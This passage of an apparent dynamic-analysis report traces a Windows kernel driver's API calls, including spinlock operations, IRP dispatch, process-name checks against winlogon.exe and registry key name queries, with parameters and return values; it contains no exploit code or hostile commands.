| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x103 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6346dc, SpinLock_unk_out = 0xffffe0003c6346dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6346dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6346dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6344fc, SpinLock_unk_out = 0xffffe0003c6344fc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6344fc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6344fc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e42c, SpinLock_unk_out = 0xffffe0003a77e42c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e42c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e42c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ddf670, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d573f78, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003a77c910 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ddf670, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d573c58, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a77c870 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002d573c58, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ProductOptions, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ProductOptions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ddf670, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d574048, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003a77c910 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ddf670, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d573d28, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a77c870 |
| ObQueryNameString | Object_ptr = 0xffffc000b9ddf670, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002d573d28, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ProductOptions, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ProductOptions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c, ret_val_ptr_out = 0xffffe0003c634190 |
| _wcsicmp | _String1 = ProductPolicy, _String2 = ImagePath, ret_val_out = 7 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #193 (length: 228, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 228 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7858ac, SpinLock_unk_out = 0xffffe0003a7858ac, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7858ac, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7858ac |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7858ac, SpinLock_unk_out = 0xffffe0003a7858ac, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7858ac, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7858ac |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769904, SpinLock_unk_out = 0xffffe0003a769904, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769904, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769904 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c757b80, Irp_unk_out = 0xffffe0003c757b80, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d296e20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c757b80, Irp_unk_out = 0xffffe0003c757b80, ret_val_out = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
